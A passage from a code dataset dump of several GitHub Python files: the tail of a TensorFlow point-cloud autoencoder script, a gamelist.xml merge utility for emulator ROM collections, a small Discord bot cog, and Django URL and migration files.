'input_pc': self.input_pc,\r\n 'input_normals_pc': self.input_normals_pc,\r\n 'input_features_pc': self.input_features_pc,\r\n 'bn_decay': None,\r\n 'is_training': self.is_training\r\n }\r\n\r\n outputs = model.get_outputs(inputs)\r\n\r\n self.out_features_pc = outputs['out_features_pc']\r\n self.out_pc = outputs['out_pc']\r\n self.out_pc_from_features = outputs['out_pc_from_features']\r\n\r\n def compute_losses(self):\r\n \"\"\"\r\n In this function we are defining the variables for loss calculations\r\n and training model.\r\n \"\"\"\r\n\r\n emd_loss = losses.emd(self.out_pc, self.input_pc)\r\n chamfer_loss, d1, d2 = losses.chamfer(self.out_pc, self.input_pc)\r\n particle_loss, corrected_proj_x, proj_x, queries, normals = losses.particle_loss(self.out_pc, self.input_pc, self.input_normals_pc, self.surface_area_pc)\r\n uniformity_mean_pred, uniformity_std_pred, uniformity_mean_gt, uniformity_std_gt = losses.evaluate_uformity(self.out_pc, self.input_pc)\r\n\r\n loss = emd_loss + particle_loss\r\n\r\n optimizer = tf.train.AdamOptimizer(self.learning_rate)\r\n\r\n self.model_vars = tf.trainable_variables()\r\n\r\n enc_pc_vars = [var for var in self.model_vars if 'enc_pc' in var.name]\r\n dec_pc_vars = [var for var in self.model_vars if 'dec_pc' in var.name]\r\n\r\n self.ae_pc_trainer = optimizer.minimize(loss, var_list=[enc_pc_vars, dec_pc_vars], global_step=self.batch)\r\n\r\n for var in self.model_vars:\r\n print(var.name)\r\n\r\n # Summary variables for tensorboard\r\n self.emd_loss = emd_loss\r\n self.cd_loss = chamfer_loss\r\n self.d1 = d1,\r\n self.d2 = d2,\r\n self.uniformity_mean_pred = uniformity_mean_pred\r\n self.uniformity_std_pred = uniformity_std_pred\r\n self.uniformity_mean_gt = uniformity_mean_gt\r\n self.uniformity_std_gt = uniformity_std_gt\r\n self.corrected_proj_x = corrected_proj_x\r\n self.proj_x = proj_x,\r\n self.queries = queries,\r\n self.normals = normals,\r\n self.ae_pc_loss = tf.summary.scalar(\"total_loss\", loss)\r\n self.ae_pc_loss_emd = tf.summary.scalar(\"emd_loss\", emd_loss)\r\n self.ae_pc_particle_loss = tf.summary.scalar(\"particle loss\", particle_loss)\r\n self.ae_pc_lr = tf.summary.scalar('lr', self.learning_rate)\r\n\r\n def save_test_images(self, sess, epoch, data):\r\n \"\"\"\r\n Saves input and output images.\r\n\r\n :param sess: The session.\r\n :param epoch: Current epoch.\r\n \"\"\"\r\n\r\n if not os.path.exists(self._images_dir):\r\n os.makedirs(self._images_dir)\r\n \r\n if not os.path.exists(self._point_clouds_dir):\r\n os.makedirs(self._point_clouds_dir)\r\n\r\n names_pc = ['inputPC_', 'reconstructedPC_', 'reconstructedPCfromFEAT_', 'pc_sampl_1_', 'pc_sampl_2_', 'pc_sampl_3_']\r\n\r\n with open(os.path.join(self._output_dir, 'epoch_pc_' + str(epoch) + '.html'), 'w') as v_pc_html:\r\n for i in range(0, self._num_imgs_to_save):\r\n print(\"Saving image {}/{}\".format(i, self._num_imgs_to_save))\r\n input_pc_, surface_area_pc, _ = data.next_batch()\r\n input_pc = input_pc_[:,:,:3]\r\n input_normals_pc = input_pc_[:,:,3:]\r\n\r\n out_features_pc, reconstructed_pc = sess.run([\r\n self.out_features_pc,\r\n self.out_pc\r\n ], feed_dict={\r\n self.input_pc: input_pc,\r\n self.input_normals_pc: input_normals_pc,\r\n self.surface_area_pc: surface_area_pc,\r\n self.is_training: False\r\n })\r\n\r\n reconstructed_from_features_pc= sess.run([\r\n self.out_pc_from_features,\r\n ], feed_dict={\r\n self.input_features_pc: out_features_pc,\r\n self.is_training: False\r\n })[0]\r\n\r\n input_pc = rotate_point_cloud(input_pc)\r\n reconstructed_pc = rotate_point_cloud(reconstructed_pc)\r\n reconstructed_from_features_pc = rotate_point_cloud(reconstructed_from_features_pc)\r\n\r\n tensors_pc = [input_pc, reconstructed_pc, reconstructed_from_features_pc]\r\n\r\n v_pc_html.write(\"
      Object: \"+str(i+1)+\"

      \")\r\n\r\n for name, tensor in zip(names_pc, tensors_pc):\r\n points = tensor[0]\r\n pc_name = name + str(epoch) + \"_\" + str(i) + \".obj\"\r\n out_filename = os.path.join(self._point_clouds_dir, pc_name)\r\n fout = open(out_filename, 'w')\r\n for j in range(points.shape[0]):\r\n fout.write('v %f %f %f\\n' % (points[j,0], points[j,1], points[j,2]))\r\n fout.close()\r\n\r\n # save point cloud as an image\r\n image_input_x = point_cloud_one_view(points)\r\n image_name = name + str(epoch) + \"_\" + str(i) + \".jpg\"\r\n imageio.imsave(os.path.join(self._images_dir, image_name), (image_input_x*255.0).astype(np.uint8))\r\n v_pc_html.write(\"\")\r\n v_pc_html.write(\"
      \")\r\n \r\n def train(self):\r\n \"\"\"Training Function.\"\"\"\r\n # Load Training and Testing Dataset\r\n TRAIN_DATASET = ShapeNetDataset(self._data_list_train, batch_size=model.BATCH_SIZE)\r\n TEST_DATASET = ShapeNetDataset(self._data_list_test, batch_size=1)\r\n\r\n # Build the network\r\n self.model_setup()\r\n\r\n # Loss function calculations\r\n self.compute_losses()\r\n\r\n # Initializing the global variables\r\n init = (tf.global_variables_initializer(),\r\n tf.local_variables_initializer())\r\n saver = tf.train.Saver()\r\n\r\n max_batches = TRAIN_DATASET.get_num_batches()\r\n\r\n config=tf.ConfigProto()\r\n config.gpu_options.allow_growth=True\r\n config.allow_soft_placement=True\r\n config.log_device_placement = False\r\n\r\n with tf.Session(config=config) as sess:\r\n sess.run(init)\r\n\r\n # Restore the model to run the model from last checkpoint\r\n if self._to_restore:\r\n chkpt_fname = tf.train.latest_checkpoint(self._checkpoint_dir)\r\n saver.restore(sess, chkpt_fname)\r\n\r\n writer = tf.summary.FileWriter(self._output_dir)\r\n\r\n if not os.path.exists(self._output_dir):\r\n os.makedirs(self._output_dir)\r\n\r\n # Training Loop\r\n for epoch in range(sess.run(self.global_step), self._max_step + 1):\r\n print(\"In the epoch \", epoch)\r\n\r\n batch_idx = 0\r\n while TRAIN_DATASET.has_next_batch():\r\n print(\"Processing batch {}/{}\".format(batch_idx, max_batches))\r\n\r\n input_pc_, surface_area_pc, _ = TRAIN_DATASET.next_batch()\r\n input_pc_ = provider.shuffle_points(input_pc_)\r\n input_pc = input_pc_[:,:,:3]\r\n input_normals_pc = input_pc_[:,:,3:]\r\n\r\n _, summary_loss_total, summary_loss_emd, summary_particle_loss, summary_lr = sess.run(\r\n [self.ae_pc_trainer,\r\n self.ae_pc_loss,\r\n self.ae_pc_loss_emd,\r\n self.ae_pc_particle_loss,\r\n self.ae_pc_lr\r\n ],\r\n feed_dict={\r\n self.input_pc: input_pc,\r\n self.input_normals_pc: input_normals_pc,\r\n self.surface_area_pc: surface_area_pc,\r\n self.is_training: True\r\n }\r\n )\r\n writer.add_summary(summary_loss_total, epoch * max_batches + batch_idx)\r\n writer.add_summary(summary_loss_emd, epoch * max_batches + batch_idx)\r\n writer.add_summary(summary_particle_loss, epoch * max_batches + batch_idx)\r\n writer.add_summary(summary_lr, epoch * max_batches + batch_idx)\r\n\r\n writer.flush()\r\n batch_idx += 1\r\n \r\n saver.save(sess, os.path.join(self._output_dir, \"ae_pc\"))\r\n\r\n batch_idx = 0\r\n self.save_test_images(sess, epoch, TEST_DATASET)\r\n TEST_DATASET.start_from_the_first_batch_again()\r\n TRAIN_DATASET.reset_one_view()\r\n sess.run(tf.assign(self.global_step, epoch + 1))\r\n\r\n writer.add_graph(sess.graph)\r\n\r\n def f_score(self, label, predict, dist_label, dist_pred, threshold):\r\n num_label = label.shape[0]\r\n num_predict = predict.shape[0]\r\n\r\n f_scores = []\r\n for i in range(len(threshold)):\r\n num = len(np.where(dist_label <= threshold[i])[0])\r\n recall = 100.0 * num / num_label\r\n num = len(np.where(dist_pred <= threshold[i])[0])\r\n precision = 100.0 * num / num_predict\r\n\r\n f_scores.append((2*precision*recall)/(precision+recall+1e-8))\r\n return np.array(f_scores)\r\n\r\n def evaluate_test_emd_and_uniformity_loss(self, sess, data):\r\n batch_idx = 0\r\n max_batches = data.get_num_batches()\r\n\r\n class_name = {\t'02691156':'plane',\r\n\t\t\t\t'02828884':'bench',\r\n\t\t\t\t'02933112':'cabinet',\r\n\t\t\t\t'02958343':'car',\r\n\t\t\t\t'03001627':'chair',\r\n\t\t\t\t'03211117':'monitor',\r\n\t\t\t\t'03636649':'lamp',\r\n\t\t\t\t'03691459':'speaker',\r\n\t\t\t\t'04090263':'firearm',\r\n\t\t\t\t'04256520':'couch',\r\n\t\t\t\t'04379243':'table',\r\n\t\t\t\t'04401088':'cellphone',\r\n\t\t\t\t'04530566':'watercraft'\r\n\t\t\t\t}\r\n model_number = {i:0 for i in class_name}\r\n sum_f = {i:0 for i in class_name}\r\n sum_cd = {i:0 for i in class_name}\r\n sum_emd = {i:0 for i in class_name}\r\n sum_uniformity_mean_pred = {i:0 for i in class_name}\r\n sum_uniformity_std_pred = {i:0 for i in class_name}\r\n sum_uniformity_mean_gt = {i:0 for i in class_name}\r\n sum_uniformity_std_gt = {i:0 for i in class_name}\r\n\r\n if not os.path.exists(self._output_dir):\r\n os.makedirs(self._output_dir)\r\n\r\n while data.has_next_batch():\r\n if batch_idx % 100 == 0:\r\n print(\"Processing batch {}/{}\".format(batch_idx, max_batches))\r\n input_pc_, surface_area_pc, model_id = data.next_batch()\r\n input_pc = input_pc_[:,:,:3]\r\n input_normals_pc = input_pc_[:,:,3:]\r\n\r\n emd_loss, cd_loss, d1, d2, out_pc, uniformity_mean_pred, uniformity_std_pred, uniformity_mean_gt, uniformity_std_gt = sess.run(\r\n [self.emd_loss, \r\n self.cd_loss,\r\n self.d1,\r\n self.d2,\r\n self.out_pc,\r\n self.uniformity_mean_pred,\r\n self.uniformity_std_pred,\r\n self.uniformity_mean_gt,\r\n self.uniformity_std_gt],\r\n feed_dict={\r\n self.input_pc: input_pc,\r\n self.input_normals_pc: input_normals_pc,\r\n self.surface_area_pc: surface_area_pc,\r\n self.is_training: False\r\n }\r\n )\r\n\r\n class_id = model_id[0]\r\n model_number[class_id] += 1.0\r\n sum_emd[class_id] += emd_loss\r\n sum_cd[class_id] += cd_loss\r\n sum_f[class_id] += self.f_score(input_pc[0],out_pc[0],d1[0],d2[0],[0.0002, 0.0004])\r\n sum_uniformity_mean_pred[class_id] += uniformity_mean_pred\r\n sum_uniformity_std_pred[class_id] += uniformity_std_pred\r\n sum_uniformity_mean_gt[class_id] += uniformity_mean_gt\r\n sum_uniformity_std_gt[class_id] += uniformity_std_gt\r\n batch_idx += 1\r\n \r\n cd_sum = 0.0\r\n emd_sum = 0.0\r\n f_sum = 0.0\r\n uniformity_mean_pred_sum = 0.0\r\n uniformity_std_pred_sum = 0.0\r\n uniformity_mean_gt_sum = 0.0\r\n uniformity_std_gt_sum = 0.0\r\n\r\n log = open(os.path.join(self._output_dir, 'record_evaluation.txt'), 'a')\r\n\r\n for item in model_number:\r\n number = model_number[item] + 1e-8\r\n emd = (sum_emd[item] / number) * 0.01\r\n cd = (sum_cd[item] / number) * 1000\r\n f = sum_f[item] / number\r\n uniform_mean_pred = sum_uniformity_mean_pred[item] / number\r\n uniform_std_pred = sum_uniformity_std_pred[item] / number\r\n uniform_mean_gt = sum_uniformity_mean_gt[item] / number\r\n uniform_std_gt = sum_uniformity_std_gt[item] / number\r\n cd_sum += cd\r\n f_sum += f\r\n emd_sum += emd\r\n uniformity_mean_pred_sum += uniform_mean_pred\r\n uniformity_std_pred_sum += uniform_std_pred\r\n uniformity_mean_gt_sum += uniform_mean_gt\r\n uniformity_std_gt_sum += uniform_std_gt\r\n\r\n print(class_name[item], int(number), f, cd, emd, uniform_mean_pred, uniform_std_pred, uniform_mean_gt, uniform_std_gt)\r\n log.write(str(class_name[item]) + ', ' + str(int(number)) + ', ' + str(f) + ', ' + str(cd) + ', ' + str(emd) \\\r\n + ', ' + str(uniform_mean_pred) + ', ' + str(uniform_std_pred) + ', ' + str(uniform_mean_gt) + ', ' + str(uniform_std_gt) + '\\n')\r\n\r\n # print('mean: ', f_sum/13.0, cd_sum/13.0 , emd_sum/13.0, \\\r\n # uniformity_mean_pred_sum/13.0, uniformity_std_pred_sum/13.0, uniformity_mean_gt_sum/13.0, uniformity_std_gt_sum/13.0)\r\n log.write('mean: ' + str(f_sum/13.0) + ', ' + str(cd_sum/13.0) + ', ' + str(emd_sum/13.0) \\\r\n + ', ' + str(uniformity_mean_pred_sum/13.0) + ', ' + str(uniformity_std_pred_sum/13.0) \\\r\n + ', ' + str(uniformity_mean_gt_sum/13.0) + ', ' + str(uniformity_std_gt_sum/13.0) + '\\n')\r\n log.close()\r\n\r\n def test(self):\r\n \"\"\"Test Function.\"\"\"\r\n\r\n TEST_DATASET = ShapeNetDataset(self._data_list_test, batch_size=1)\r\n\r\n self.model_setup()\r\n self.compute_losses()\r\n saver = tf.train.Saver()\r\n init = tf.global_variables_initializer()\r\n\r\n config=tf.ConfigProto()\r\n config.gpu_options.allow_growth=True\r\n config.allow_soft_placement=True\r\n config.log_device_placement = False\r\n\r\n with tf.Session(config=config) as sess:\r\n sess.run(init)\r\n\r\n chkpt_fname = tf.train.latest_checkpoint(self._checkpoint_dir)\r\n saver.restore(sess, chkpt_fname)\r\n\r\n self.evaluate_test_emd_and_uniformity_loss(sess, TEST_DATASET)\r\n TEST_DATASET.start_from_the_first_batch_again()\r\n self.save_test_images(sess, \"test\", TEST_DATASET)\r\n\r\n\r\n@click.command()\r\n@click.option('--to_train',\r\n type=click.INT,\r\n default=True,\r\n help='Whether it is train or false.')\r\n@click.option('--log_dir',\r\n type=click.STRING,\r\n default=None,\r\n help='Where the data is logged to.')\r\n@click.option('--config_filename',\r\n type=click.STRING,\r\n default='train',\r\n help='The name of the configuration file.')\r\n@click.option('--checkpoint_dir',\r\n type=click.STRING,\r\n default='',\r\n help='The name of the train/test split.')\r\ndef main(to_train, log_dir, config_filename, checkpoint_dir):\r\n \"\"\"\r\n\r\n :param to_train: Specify whether it is training or testing. 1: training; 2:\r\n resuming from latest checkpoint; 0: testing.\r\n :param log_dir: The root dir to save checkpoints and imgs. The actual dir\r\n is the root dir appended by the folder with the name timestamp.\r\n :param config_filename: The configuration file.\r\n :param checkpoint_dir: The directory that saves the latest checkpoint. It\r\n only takes effect when to_train == 2.\r\n :param skip: A boolean indicating whether to add skip connection between\r\n input and output.\r\n \"\"\"\r\n if not os.path.isdir(log_dir):\r\n os.makedirs(log_dir)\r\n\r\n with open(config_filename) as config_file:\r\n config = json.load(config_file)\r\n\r\n to_restore = (to_train == 2)\r\n base_lr = float(config['base_lr']) if 'base_lr' in config else 0.0002\r\n max_step = int(config['max_step']) if 'max_step' in config else 200\r\n data_list_train = str(config['data_list_train'])\r\n data_list_test = str(config['data_list_test'])\r\n\r\n ae_model = AE_PC(log_dir, to_restore, to_train, base_lr, max_step, checkpoint_dir, data_list_train, data_list_test)\r\n\r\n if to_train > 0:\r\n ae_model.train()\r\n else:\r\n ae_model.test()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"akomarichev/joint_latent_space","sub_path":"main_ae_pc_adaptive.py","file_name":"main_ae_pc_adaptive.py","file_ext":"py","file_size_in_byte":21694,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72134822632","text":"#!/usr/bin/env python3\n\nimport os, sys, shutil, argparse, re, glob, shutil\nimport xml.etree.ElementTree as ET\n\n\ndef normalize_dir(path):\n\treturn os.path.expanduser(path).rstrip('/')+'/'\n\n\ndef get_cue_filelist(fn):\n\tdir = os.path.dirname(fn)\n\tentries = [L for L in open(fn).readlines() if L.strip().startswith('FILE')]\n\tout = [L[L.find('\"')+1:L.rfind('\"')] for L in entries]\n\treturn [dir+'/'+f for f in out]\n\n\ndef get_m3u_filelist(fn):\n\tdir = os.path.dirname(fn)\n\tentries = [L.strip() for L in open(fn).readlines() if L.strip()]\n\treturn [dir+'/'+f for f in entries]\n\n\ndef get_game_id(game):\n\tglobal key, normalize\n\tif game.find(key) == None:\n\t\treturn None\n\ts = os.path.basename(game.find(key).text)\n\treturn normalize(s)\n\n\ndef getFileSize(fn):\n\ttry:\n\t\tret = os.path.getsize(fn)\n\t\tif fn.lower().endswith('.cue'):\n\t\t\tret += sum([os.path.getsize(f1) for f1 in get_cue_filelist(fn)])\n\t\telif fn.lower().endswith('.m3u'):\n\t\t\tret += sum([os.path.getsize(f1) for f1 in get_m3u_filelist(fn)])\n\t\treturn ret\n\texcept:\n\t\treturn 0\n\n\ndef deleteFileIfNeeded(path, fn): # non-ROM\n\ttry:\n\t\tprint(f'Deleting {path+fn} ...', file = sys.stderr)\n\t\tos.remove(path+fn)\n\texcept FileNotFoundError as e:\n\t\tpass\n\texcept Exception as e:\n\t\tprint(f'Error: {str(e)}', file = sys.stderr)\n\n\ndef copyOverFileIfNeeded(src_path, src_fn, dst_path, dst_fn): # non-ROM\n\ttry:\n\t\tif src_path=='' or dst_path=='' or not src_fn.startswith('./') or not dst_fn.startswith('./'):\n\t\t\treturn\n\t\tsrc_full = src_path + src_fn[2:]\n\t\tdst_full = dst_path + dst_fn[2:]\n\t\tsrc_size, dst_size = getFileSize(src_full), getFileSize(dst_full)\n\texcept:\n\t\tpass\n\tif src_size != dst_size and src_size:\n\t\ttry:\n\t\t\tprint(f'Copying {src_full} -> {dst_full}', file = sys.stderr)\n\t\t\tos.makedirs(os.path.dirname(dst_full), exist_ok = True)\n\t\t\tshutil.copyfile(src_full, dst_full)\n\t\texcept Exception as e:\n\t\t\tprint(f'Error: {str(e)}', file = sys.stderr)\n\n\ndef copyRomFiles(src_full, dst_path):\n\tdef copy_file(src_fn, tgt):\n\t\ttry:\n\t\t\tdst_fn = tgt + os.path.basename(src_fn) if os.path.isdir(tgt) else tgt\n\t\t\tsrc_size, dst_size = getFileSize(src_fn), getFileSize(dst_fn)\n\t\t\tif src_size != dst_size and src_size:\n\t\t\t\tprint(f'Copying {src_fn} -> {tgt}', file = sys.stderr)\n\t\t\t\tshutil.copy(src_fn, tgt)\n\t\t\telse:\n\t\t\t\tprint(f'Skipping {src_fn} == {dst_fn}', file = sys.stderr)\n\t\texcept shutil.SameFileError:\n\t\t\tpass\n\t\texcept Exception as e:\n\t\t\tprint(f'Error: {str(e)}', file = sys.stderr)\n\n\tos.makedirs(os.path.dirname(dst_path), exist_ok = True)\n\tsrc_patn = src_full.rsplit('.', 1)[0] + '.*'\n\tprint(f'Copying {src_patn} -> {dst_path}', file = sys.stderr)\n\tfor file in glob.glob(src_patn.replace('[','[[]').replace(']','[]]')):\n\t\tcopy_file(file, dst_path)\n\tif src_full.lower().endswith('.cue'):\n\t\tfor file in get_cue_filelist(src_full):\n\t\t\tcopy_file(file, dst_path)\n\telif src_full.lower().endswith('.m3u'):\n\t\tfor file in get_m3u_filelist(src_full):\n\t\t\tcopy_file(file, dst_path)\n\n\ndef deleteRomFiles(src_full):\n\tdef del_file(filename):\n\t\tprint(f'Deleting {filename} ...', file = sys.stderr)\n\t\ttry:\n\t\t\tos.remove(filename)\n\t\texcept FileNotFoundError:\n\t\t\tpass\n\t\texcept Exception as e:\n\t\t\tprint(f'Error: {str(e)}', file = sys.stderr)\n\tsrc_patn = src_full.rsplit('.', 1)[0] + '.*'\n\tfor filename in glob.glob(src_patn.replace('[','[[]').replace(']','[]]')):\n\t\tif filename.lower().endswith('.cue'):\n\t\t\tfor fn in get_cue_filelist(filename):\n\t\t\t\tdel_file(fn)\n\t\telif filename.lower().endswith('.m3u'):\n\t\t\tfor fn in get_m3u_filelist(filename):\n\t\t\t\tdel_file(fn)\n\t\tdel_file(filename)\n\n\ndef gamelist_verify(source, src_path):\n\tprint(f'Parsing {source} ...', end = ' ', flush = True, file = sys.stderr)\n\tsrc_tree = ET.parse(source)\n\tsrc_root = src_tree.getroot()\n\tprint(f\"{len(src_root)} entries\", file = sys.stderr)\n\n\t# main loop\n\tfor game in src_root.findall('game'):\n\t\tgame_info = {d.tag: d.text for d in game}\n\t\tfor k, v in game_info.items():\n\t\t\tif v is None: continue\n\t\t\tif not v.startswith('./'): continue\n\t\t\tif getFileSize(src_path, v[2:]) == 0:\n\t\t\t\tprint(f'Missing file: {src_path+v[2:]}')\n\t\t\telif v.lower().endswith('.m3u'):\n\t\t\t\tfor fn in get_m3u_filelist(src_path+v[2:]):\n\t\t\t\t\tif getFileSize(fn) == 0:\n\t\t\t\t\t\tprint(f'Missing M3U: {src_path+v[2:]}')\n\t\t\telif v.lower().endswith('.cue'):\n\t\t\t\tfor fn in get_cue_filelist(src_path+v[2:]):\n\t\t\t\t\tif getFileSize(fn) == 0:\n\t\t\t\t\t\tprint(f'Missing CUE: {src_path+v[2:]}')\n\n\ndef gamelist_merge(output, sources, out_path, src_dirs, rule):\n\tglobal key\n\n\tif not sources:\n\t\treturn ET.ElementTree()\n\n\tgame_dict = {}\n\tprint(f'Parsing {sources[0]} as baseline ...', end = ' ', flush = True)\n\tout_tree = ET.parse(sources[0])\n\tout_root = out_tree.getroot()\n\tprint(f\"{len(out_root)} entries\")\n\n\t# clear output tree\n\tfor i in out_root.findall('game'):\n\t\tout_root.remove(i)\n\n\t# iterate over every source file\n\tfor source, src_path in zip(sources, src_dirs):\n\t\tprint(f'Parsing {source} ...', end = ' ', flush = True)\n\t\tsrc_tree = ET.parse(source)\n\t\tsrc_root = src_tree.getroot()\n\t\tprint(f\"{len(src_root)} entries\")\n\n\t\t# main loop\n\t\tfor game in src_root.findall('game'):\n\t\t\tgame_id = get_game_id(game)\n\t\t\tif not game_id: continue\n\t\t\tif game_id not in game_dict: # new entry, copy over all files\n\t\t\t\tif getFileSize(src_path+game.find(key).text) == 0: # missing ROM, discard\n\t\t\t\t\tcontinue\n\t\t\t\tgame_dict[game_id] = game\n\t\t\t\tout_root.append(game)\n\t\t\t\tfor entry in game:\n\t\t\t\t\tif entry.text and entry.text.startswith('./'):\n\t\t\t\t\t\tif entry.tag == key:\n\t\t\t\t\t\t\tcopyRomFiles(src_path + entry.text[2:], out_path)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcopyOverFileIfNeeded(src_path, entry.text, out_path, entry.text)\n\t\t\t\tcontinue\n\t\t\tif not rule:\n\t\t\t\tcontinue\n\n\t\t\t# do internal merge: choose baseline or source\n\t\t\tbl_game = game_dict[game_id]\n\t\t\tbl_info = {d.tag: d.text for d in bl_game}\n\t\t\tnew_info = {d.tag: d.text for d in game}\n\t\t\tfor k, v in new_info.items():\n\t\t\t\tif k not in bl_info: # for new field just add, cannot be ROM\n\t\t\t\t\te = ET.Element(k)\n\t\t\t\t\te.text = v\n\t\t\t\t\tif len(bl_game):\n\t\t\t\t\t\te.tail = bl_game[-1].tail\n\t\t\t\t\t\tbl_game[-1].tail = bl_game[0].tail\n\t\t\t\t\tbl_game.append(e)\n\t\t\t\t\tif v.startswith('./'):\n\t\t\t\t\t\tcopyOverFileIfNeeded(src_path, v, out_path, v)\n\t\t\t\t\tcontinue\n\t\t\t\tif v is None: # None will not overwrite anything\n\t\t\t\t\tcontinue\n\t\t\t\tif v.startswith('./'): # is a filename field\n\t\t\t\t\tvs = v[2:]\n\t\t\t\t\tbl_filesize = getFileSize(out_path+bl_game.find(k).text[2:])\n\t\t\t\t\tnew_filesize = getFileSize(src_path+vs)\n\t\t\t\t\tif bl_filesize != new_filesize:\n\t\t\t\t\t\tif k == key: # is ROM file\n\t\t\t\t\t\t\trule1 = rule.get(k, 'smaller')\n\t\t\t\t\t\t\tif (new_filesize>bl_filesize and rule1=='bigger') or (new_filesize', 'bigger'))\n\t\t\t\t\t\t\tif (new_filesize>bl_filesize and rule1=='bigger') or (new_filesize', 'longer'))\n\t\t\t\t\t\tif (new_strlen>bl_strlen and rule1=='longer') or (new_strlen ... [options] 1>output 2>progress',\n\t description = 'The world\\'s best program (up to today) for merging gamelist.xml (it can merge multiple game lists in one go)\\n'\n\t 'It can resolve duplicates both within the same gamelist.xml and across multiple gamelist.xml\\n'\n\t 'It can work on just the list files (gamelist.xml) only or together with the directory of all the files\\n'\n\t 'For input: you can keep different sources into different folders or lump everything into one single folder\\n'\n\t 'For output: you can modify resources inplace (same input/output ) or output to a different folder\\n'\n\t 'You can specify merge rules (or no internal merge), for string field keep \"longer\" or \"shorter\", for file keep \"bigger\" or \"smaller\"\\n'\n\t 'By default, it will keep longer string field (expect more detailed description), smaller ROM file (more efficient compression), bigger resource file (better resolution image/video)',\n\t formatter_class = argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('output', help = 'output gamelist.xml file')\n\tparser.add_argument('sources', help = 'input gamelist.xml files, first file has the highest priority in the event of tie rule or no merge', nargs = '+')\n\tparser.add_argument('--key', '-k', help = 'the key field for distinguishing different games', default = 'path')\n\tparser.add_argument('--resource', '-r', help = 'transfer resource files (use the directory of gamelist.xml if and are not specified)', action = 'store_true')\n\tparser.add_argument('--norm', '-n', help = 'Python code for normalizing game names',\n\t default = 're.sub(r\" +\", \" \", re.sub(\"\\[.*\\]\", \"\", s.rsplit(\".\",1)[0].replace(\"!\", \"\").replace(\"(USA)\",\"(U)\").replace(\"(US)\",\"(U)\").replace(\"(Europe)\", \"(E)\"))).strip().lower()')\n\tparser.add_argument('--source-dir', '-sd', help = 'the root directory(ies) containing all the ROM/preview files, if present, resource files will be moved, if multiple are specified, its number must match that in ', default = [], nargs = '+')\n\tparser.add_argument('--output-dir', '-od', help = 'the output directory containing all the ROM/preview files, if present, resource files will be moved, can be the same as any ', default = '')\n\tparser.add_argument('--mergerule', '-m', help = 'the merge rule, refer to all filename fields, refer to all non-filename fields, set to {} for no internal merge',\n\t default = \"{'path':'smaller', '':'bigger', '':'longer'}\")\n\t# nargs='?': optional positional argument; action='append': multiple instances of the arg; type=; default=\n\topt = parser.parse_args()\n\tglobals().update(vars(opt))\n\n\tif resource and not output_dir:\n\t\toutput_dir = os.path.dirname(output)\n\n\tif not source_dir:\n\t\tsource_dir = [os.path.dirname(src1) for src1 in sources] if resource else ['']*len(sources)\n\telif len(source_dir)==1:\n\t\tsource_dir = source_dir*len(sources)\n\telse:\n\t\tassert len(source_dir)==len(sources), 'Number of items in must match that in (or be 1 (the same for every ))'\n\n\trule = eval(mergerule)\n\tnormalize = lambda s: eval(norm)\n\n\tgamelist_merge(os.path.expanduser(output), [os.path.expanduser(fn) for fn in sources], normalize_dir(output_dir), [normalize_dir(p) for p in source_dir], rule)\n","repo_name":"xuancong84/public","sub_path":"RPi4/utils/gamelist-merge.py","file_name":"gamelist-merge.py","file_ext":"py","file_size_in_byte":11779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39335920325","text":"import discord\nfrom discord.ext import commands\nimport requests\nimport json\n\nclass side_runners():\n\tdef get_quote(self):\n\t\tresponse = requests.get(\"https://zenquotes.io/api/random\")\n\t\tjson_data = json.loads(response.text)\n\n\t\tif \"Obtain an auth key for unlimited access. - zenquotes.io\" in json_data[0]['q']:\n\t\t\tembed = discord.Embed(\n\t\t\t\ttitle = \"Hey! slow down, or i shall be spinning too fast to exist :(\"\n\t\t\t)\n\t\t\tembed.set_author(name = self.user.name, icon_url = self.user.avatar_url)\n\t\telse:\n\t\t\tembed = discord.Embed(\n\t\t\t\ttitle = json_data[0]['a'],\n\t\t\t\tdescription = \"**{0}**\".format(json_data[0]['q'])\n\t\t\t)\n\t\t\tembed.set_thumbnail(\"https://i.postimg.cc/SRkM97Yh/quotes.jpg\")\n\n\t\treturn embed\n\nclass fun(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self._last_member = None\n\n @commands.command()\n async def quote(self, ctx):\n ctx.send(side_runners.get_quote(self.bot))\n\n @commands.command()\n async def mirror(self, ctx, message):\n await ctx.send(message)\n\n\ndef setup(bot):\n bot.add_cog(fun(bot))","repo_name":"imyashi0722/Pulsar-Discord.py","sub_path":"Functions/Fun/otherfuncommands.py","file_name":"otherfuncommands.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13788780509","text":"from django.urls import path, include\n\nfrom forexer.trade.views import (\n TradeListView,\n TradeCreateView,\n tradequote,\n available_currencies,\n)\n\n\nurlpatterns = [\n path('', TradeListView.as_view(), name='trade-listview'),\n path('create/', TradeCreateView.as_view(), name='trade-createview'),\n path('quote/', tradequote, name='trade-quote'),\n path('available-currencies/', available_currencies, name='trade-currencies'),\n]\n","repo_name":"zoliszeredi/forexer","sub_path":"src/forexer/trade/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14574545559","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('store', '0012_auto_20150510_2148'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='image',\n name='description',\n field=models.TextField(default='A lovely description'),\n preserve_default=True,\n ),\n ]\n","repo_name":"kentah/shop","sub_path":"store/migrations/0013_image_description.py","file_name":"0013_image_description.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8422475299","text":"#!/usr/bin/python\nimport sys\n#import argparse\n\nimport MkS\n\nif __name__ == '__main__':\n _version = '0.5.0'\n \n project = MkS.MkSProject()\n \n '''\n parser = argparse.ArgumentParser( description = 'A project source and package releaser.' )\n \n parser.add_argument( '-v', action='version', version='%(prog)s v{0}'.format( _version ) )\n \n parser.add_argument(\n '-name', dest = 'name',\n default = project.name,\n help = 'set the project name'\n )\n \n 